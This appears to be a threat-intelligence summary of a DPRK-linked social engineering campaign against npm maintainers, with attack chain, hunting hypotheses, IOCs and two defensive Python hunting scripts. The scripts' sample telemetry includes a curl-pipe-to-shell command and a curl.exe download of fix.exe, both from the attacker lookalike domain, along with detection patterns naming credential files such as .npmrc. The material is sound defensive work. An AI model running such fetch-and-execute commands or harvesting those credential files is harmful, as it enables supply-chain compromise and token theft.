Severity: critical · 5 min read

Attackers Are Hunting High-Impact Node.js Maintainers in a Coordinated Social Engineering Campaign

A sophisticated social engineering campaign linked to DPRK-nexus actor UNC1069 is targeting high-impact Node.js and npm maintainers. Attackers build rapport over weeks before luring victims to spoofed video conferencing sites that deploy infostealing malware designed to hijack session tokens, bypass 2FA, and compromise the open-source software supply chain.

Sens: Immediate · Conf: high · Analyzed: 2026-04-08

Authors: Socket.dev

Actors / Tags: UNC1069, DPRK-nexus, Mentalpositive.Stealer, WAVESHAPER, HYPERCALL, DEEPBREATH, CHROMEPUSH

Source: Socket

IOCs · 2

Key Takeaways

  • A coordinated social engineering campaign is targeting high-impact Node.js and npm maintainers to compromise the open-source software supply chain.
  • Attackers build long-term rapport via LinkedIn and Slack using fake personas (e.g., 'Openfort') before luring victims to spoofed video conferencing sites.
  • Fake meeting platforms (spoofing MS Teams or Streamyard) present technical errors to trick victims into downloading malicious installers or running terminal commands.
  • The payload is an infostealer/RAT that bypasses 2FA by exfiltrating session cookies, AWS credentials, and .npmrc tokens.
  • The campaign is linked to DPRK-nexus threat actor UNC1069, which has pivoted from targeting the cryptocurrency sector to open-source maintainers.

Affected Systems

  • macOS and Windows developer workstations
  • Node.js and npm maintainer accounts

Attack Chain

Attackers identify high-impact open-source maintainers and build rapport over several weeks via LinkedIn and Slack using fake personas. They invite the victim to a scheduled video interview on a spoofed conferencing platform. During the call, a fake technical error prompts the victim to download a malicious installer or run a curl command. Once executed, the malware deploys an infostealer/RAT that exfiltrates session cookies, credentials, and .npmrc tokens, allowing attackers to bypass 2FA and publish malicious packages to the npm registry.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide specific detection rules or queries, focusing instead on the social engineering TTPs, infrastructure patterns, and high-level behavioral indicators.

Detection Engineering Assessment

  • EDR Visibility: High. EDR solutions are well-positioned to detect the execution of malicious downloaded apps (like StreamYardInstaller.app), suspicious curl commands spawned from browsers, and unauthorized access to sensitive files like .npmrc.
  • Network Visibility: Medium. While C2 traffic (beaconing every 60s) and downloads from spoofed domains can be detected, the initial social engineering occurs over encrypted, legitimate third-party channels (LinkedIn, Slack).
  • Detection Difficulty: Moderate. The social engineering aspect is difficult to detect technically, but the execution phase (downloading fake meeting apps, running curl commands, accessing .npmrc) provides solid behavioral detection opportunities.

Required Log Sources

  • Process Creation Logs
  • File Access Logs
  • DNS Query Logs
  • Web Proxy/Gateway Logs

Hunting Hypotheses

  • Hypothesis: Look for unexpected execution of curl or other downloaders originating from web browsers or chat applications. | Telemetry: Process Creation | ATT&CK Stage: Execution | FP Risk: Medium
  • Hypothesis: Monitor for unusual processes accessing or exfiltrating developer credential files such as .npmrc, AWS credentials, or SSH keys. | Telemetry: File Access | ATT&CK Stage: Credential Access | FP Risk: Low
  • Hypothesis: Identify network connections to newly registered or suspicious domains containing keywords like 'teams', 'zoom', or 'meet' (e.g., teams.onlivemeet.com). | Telemetry: DNS/Network | ATT&CK Stage: Command and Control | FP Risk: Medium
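The three hypotheses above, implemented as hunting logic over constructed sample telemetry. This is an added example, not code from the Socket report or from any EDR vendor: the event field names (host, parent, image, cmdline, path, query), the allowlists of expected credential consumers and legitimate conferencing vendors, and every sample record are assumptions made for the demonstration. The only page-sourced values are the lookalike domain teams.onlivemeet.com and the .npmrc and StreamYardInstaller.app names.

```python
"""Hunting logic for the three hypotheses above, run over constructed telemetry."""
import re
from collections import namedtuple

# Parents from which a downloader should not normally be spawned (assumed list).
BROWSER_AND_CHAT_PARENTS = {"google chrome", "safari", "firefox", "chrome.exe",
                            "msedge.exe", "slack", "slack.exe", "discord"}
DOWNLOADERS = {"curl", "curl.exe", "wget", "powershell.exe", "certutil.exe"}

# Credential files worth hunting on, and the tools expected to read them (assumed).
CREDENTIAL_PATHS = re.compile(r"(/|\\)(\.npmrc|\.aws(/|\\)credentials|\.ssh(/|\\)id_[^/\\]+)$")
CREDENTIAL_READERS = {"npm", "node", "aws", "ssh", "ssh-agent", "git"}

# Conferencing keywords, and the registrable domains where they legitimately appear.
CONFERENCING_KEYWORDS = ("teams", "zoom", "meet", "webex", "streamyard")
LEGIT_CONFERENCING = {"microsoft.com", "zoom.us", "google.com", "webex.com", "streamyard.com"}

Finding = namedtuple("Finding", "hypothesis fp_risk host evidence")

# Constructed sample events; the schema is an assumption, not a vendor format.
PROCESS_EVENTS = [
    {"host": "dev-mac-01", "parent": "Slack", "image": "curl",
     "cmdline": "curl -fsSL https://teams.onlivemeet.com/fix.sh | sh"},
    {"host": "dev-mac-01", "parent": "Terminal", "image": "curl",
     "cmdline": "curl -O https://nodejs.org/dist/index.json"},
    {"host": "dev-mac-01", "parent": "Google Chrome", "image": "StreamYardInstaller.app",
     "cmdline": "/Users/dev/Downloads/StreamYardInstaller.app/Contents/MacOS/installer"},
    {"host": "dev-win-02", "parent": "chrome.exe", "image": "curl.exe",
     "cmdline": "curl.exe -o fix.exe https://teams.onlivemeet.com/fix.exe"},
]
FILE_EVENTS = [
    {"host": "dev-mac-01", "image": "installer", "path": "/Users/dev/.npmrc"},
    {"host": "dev-mac-01", "image": "npm", "path": "/Users/dev/.npmrc"},
    {"host": "dev-mac-01", "image": "installer", "path": "/Users/dev/.aws/credentials"},
    {"host": "dev-win-02", "image": "ssh", "path": "C:\\Users\\dev\\.ssh\\id_ed25519"},
]
DNS_EVENTS = [
    {"host": "dev-mac-01", "query": "teams.onlivemeet.com"},
    {"host": "dev-mac-01", "query": "teams.microsoft.com"},
    {"host": "dev-mac-01", "query": "meet.google.com"},
    {"host": "dev-win-02", "query": "meet-secure-login.example"},  # constructed lookalike
]


def registrable_domain(fqdn):
    """Naive eTLD+1 (last two labels); a real hunt would use the public suffix list."""
    labels = fqdn.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def hunt_spawned_downloaders(events):
    """Hypothesis 1: a downloader whose parent is a browser or chat client."""
    return [Finding("downloader-from-browser-or-chat", "Medium", e["host"], e["cmdline"])
            for e in events
            if e["image"].lower() in DOWNLOADERS
            and e["parent"].lower() in BROWSER_AND_CHAT_PARENTS]


def hunt_credential_file_access(events):
    """Hypothesis 2: a credential file read by a process that is not a known consumer."""
    return [Finding("credential-file-access", "Low", e["host"], f'{e["image"]} -> {e["path"]}')
            for e in events
            if CREDENTIAL_PATHS.search(e["path"])
            and e["image"].lower() not in CREDENTIAL_READERS]


def hunt_conferencing_lookalikes(events):
    """Hypothesis 3: conferencing keyword in a domain not owned by a known vendor."""
    out = []
    for e in events:
        q = e["query"].lower()
        if any(k in q for k in CONFERENCING_KEYWORDS) and registrable_domain(q) not in LEGIT_CONFERENCING:
            out.append(Finding("conferencing-lookalike-domain", "Medium", e["host"], q))
    return out


def run_hunts():
    """Run all three hunts over the constructed sample data and return the findings."""
    return (hunt_spawned_downloaders(PROCESS_EVENTS)
            + hunt_credential_file_access(FILE_EVENTS)
            + hunt_conferencing_lookalikes(DNS_EVENTS))


if __name__ == "__main__":
    for f in run_hunts():
        print(f"[{f.fp_risk}] {f.hypothesis} on {f.host}: {f.evidence}")
```

The allowlists are where the FP risk from the table actually lives: the credential-file hunt stays low-noise only if the reader list is tight, and the domain hunt needs the public suffix list rather than the two-label shortcut before it is run against real DNS logs.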

Control Gaps

  • Multi-Factor Authentication (bypassed via session/token theft)
  • Email/Phishing Filters (bypassed by using LinkedIn/Slack)

Key Behavioral Indicators

  • Execution of unsigned or suspiciously named conferencing installers (e.g., StreamYardInstaller.app)
  • Processes making regular beaconing connections (every 60 seconds)
  • Access to browser cookie databases by non-browser processes
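The "regular beaconing connections (every 60 seconds)" indicator above, turned into a check over connection telemetry. This is an added example, not code from the Socket report: the record layout, the thresholds (minimum connection count, maximum interval variation, minimum period) and the sample hosts, process names and RFC 5737 test addresses are all constructed for the demonstration. It flags any (host, process, destination) group whose inter-connection gaps are nearly constant, which catches the 60-second case without hard-coding 60.

```python
"""Detect fixed-interval beaconing in constructed connection telemetry."""
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import mean, median, pstdev

MIN_CONNECTIONS = 6   # enough samples for the interval statistics to mean anything
MAX_CV = 0.15         # std/mean of the gaps; an unjittered beacon sits near 0
MIN_PERIOD_S = 10     # ignore very chatty traffic such as keepalives and fast polling


def _parse(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def _series(host, image, dest, start, gaps):
    """Build one connection record per gap, starting at `start` (constructed data)."""
    t = _parse(start)
    records = []
    for gap in [0] + gaps:
        t += timedelta(seconds=gap)
        records.append({"ts": t, "host": host, "image": image, "dest": dest})
    return records


# Constructed sample: a 60-second beacon, ordinary browsing, and fast legitimate polling.
CONNECTIONS = (
    _series("dev-mac-01", "installer", "203.0.113.10:443", "2026-04-07T10:03:00Z", [60] * 9)
    + _series("dev-mac-01", "Google Chrome", "198.51.100.20:443", "2026-04-07T10:03:05Z",
              [3, 41, 2, 180, 7, 95, 12, 300, 1])
    + _series("dev-mac-01", "node", "198.51.100.30:443", "2026-04-07T10:10:00Z", [2] * 6)
)


def find_beacons(connections, min_connections=MIN_CONNECTIONS, max_cv=MAX_CV,
                 min_period_s=MIN_PERIOD_S):
    """Group by (host, process, destination); flag groups whose inter-connection
    gaps are numerous, not too short, and nearly constant."""
    groups = defaultdict(list)
    for c in connections:
        groups[(c["host"], c["image"], c["dest"])].append(c["ts"])

    findings = []
    for (host, image, dest), times in groups.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg < min_period_s:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            findings.append({"host": host, "image": image, "dest": dest,
                             "period_s": round(median(gaps)), "cv": round(cv, 3),
                             "count": len(times)})
    return findings


if __name__ == "__main__":
    for f in find_beacons(CONNECTIONS):
        print(f"{f['host']} {f['image']} -> {f['dest']}: every {f['period_s']}s "
              f"x{f['count']} (cv={f['cv']})")
```

Pair this with the process-creation context from the same host: a regular beacon from a process that was itself launched by a browser-downloaded installer is a far stronger signal than either observation alone.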

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Block known malicious domains (e.g., teams.onlivemeet.com) at the network perimeter.
  • Search endpoint telemetry for execution of 'StreamYardInstaller.app' or related suspicious curl commands.
  • Revoke and rotate npm tokens, AWS credentials, and session cookies for any maintainers who interacted with the threat actors.

Infrastructure Hardening

  • Implement strict endpoint controls to prevent execution of unsigned or unapproved applications.
  • Restrict access to sensitive developer files (like .npmrc) to authorized tools only.

User Protection

  • Deploy EDR solutions on all developer workstations to monitor for infostealer behavior and credential access.
  • Enforce hardware security keys (FIDO2) where possible, while acknowledging that session hijacking still poses a risk.

Security Awareness

  • Educate developers and maintainers about advanced social engineering tactics on LinkedIn and Slack.
  • Train staff to recognize spoofed video conferencing domains and fake technical error prompts.
  • Establish a verification protocol for external meeting invites and software download requests.

MITRE ATT&CK Mapping

  • T1566.002 - Phishing: Spearphishing Link
  • T1566.003 - Phishing: Spearphishing via Service
  • T1582 - Gather Victim Identity Information
  • T1204.001 - User Execution: Malicious Link
  • T1204.002 - User Execution: Malicious File
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1552.004 - Unsecured Credentials: Private Keys
  • T1539 - Steal Web Session Cookie
  • T1071.001 - Application Layer Protocol: Web Protocols

Additional IOCs

  • Domains:
    • teams[.]onlivemeet[.]com - Spoofed Microsoft Teams domain
  • File Paths:
    • .npmrc - Targeted configuration file containing npm publishing tokens for exfiltration.
  • Command Lines:
    • curl (Purpose: Download and execute payload via terminal as a fallback method | Tools: curl | Stage: Execution)
  • Other:
    • Joan Alavedra - Threat actor persona used on LinkedIn and Slack
    • Stefaniya Smirnova - Threat actor persona used on Slack
    • joana.personal@proton.me - Threat actor email address